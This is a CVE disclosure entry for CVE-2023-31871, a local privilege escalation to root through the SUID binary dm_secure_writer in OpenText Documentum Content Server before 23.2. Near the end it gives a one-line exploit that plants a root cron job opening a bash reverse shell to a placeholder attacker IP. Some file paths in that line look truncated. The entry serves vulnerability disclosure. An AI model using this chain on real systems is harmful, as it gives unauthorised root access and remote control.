

CVE-2023-31871: OpenText Documentum Content Server < 23.2 SUID Local Privilege Escalation

OpenText Documentum Content Server before 23.2 has a flaw that allows for privilege escalation from a non-privileged Documentum user to root. The software comes prepackaged with a root owned SUID binary dm_secure_writer. The binary has security controls in place preventing creation of a file in a non-owned directory, or as the root user. However, these controls can be carefully bypassed to allow for an arbitrary file write as root.


OpenText Documentum Content Server < 23.2 SUID Local Privilege Escalation

[Suggested description]

OpenText Documentum Content Server before 23.2 has a flaw that allows

for privilege escalation from a non-privileged Documentum user to root.

The software comes prepackaged with a root owned SUID binary

dm_secure_writer. The binary has security controls in place preventing

creation of a file in a non-owned directory, or as the root user.

However, these controls can be carefully bypassed to allow for an

arbitrary file write as root.


[Vulnerability Type]

Local Privilege Escalation via SetUID Binary


[Vendor of Product]



[Affected Product Code Base]

Documentum Content Server - Before 23.2, Fixed in 23.2.


[Affected Component]

The affected SUID is dm_secure_writer.


[Attack Type]



[Impact Code execution]



[Impact Escalation of Privileges]



[Attack Vectors]

Local access as the Documentum Content Server user to the machine with the affected software.




[Has vendor confirmed or acknowledged the vulnerability?]




ln -s /<Documentum Home>/dm_secure_writer /tmp/secure_writer; echo "bash -i >& /dev/tcp/<ATTACKER IP>/4444 0>&1">/tmp/; chmod +x /tmp/; echo “* * * * * root /tmp/” | /tmp/secure_writer test -1 /etc/cron.d/evilcron




CVE: Latest News

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